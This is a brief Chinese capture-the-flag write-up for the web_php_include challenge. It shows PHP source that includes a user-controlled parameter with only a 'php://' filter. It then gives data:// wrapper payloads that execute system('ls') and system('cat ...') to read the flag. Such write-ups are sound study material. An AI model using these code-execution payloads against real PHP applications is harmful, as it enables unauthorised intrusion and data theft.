攻防世界 web_php_include
2024-09-05 17:37:31
Web_php_include
进入题目源码直接出来了
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
看见了include函数并且发现过滤了php://,由此估计需要使用伪协议来读取flag内容,由于过滤掉了php,所以我们直接使用data://协议来执行指令
payload
?page=data://text/plain,<?system(%27ls%27);?>
然后又是cat查看一下就行
page=data://text/plain,<?system(%27cat%20fl4gisisish3r3.php%27);?>
但是页面没有回显任何内容,还以为我哪里做错了原来查看源码就发现了flag
最新文章
- 自定义angularjs分页控件
- node.js 学习
- 小米手机(HM1SW)高通开发android程序全过程
- JQ分页功能
- 50条LINUX命令整理
- Linux NFS 介绍
- iOSS--生成有logo的二维码
- 一个Java对象到底占用多大内存?
- UIButton 在 iOS7.0与iOS7.1 中关于enabled的一点区别
- memcache运维整理
- XML Schema <;第三篇>;
- 泛型集合、datatable常用数据类型转换Json帮助类
- 用python实现简单购物车功能
- Android进阶(二十八)上下文菜单ContextMenu使用案例
- CSS实现div高度自适应
- XSS攻击介绍
- Spring Data
- p值还是 FDR ?
- 如何用Delphi开发网游外挂
- [机器学习&;数据挖掘]SVM---核函数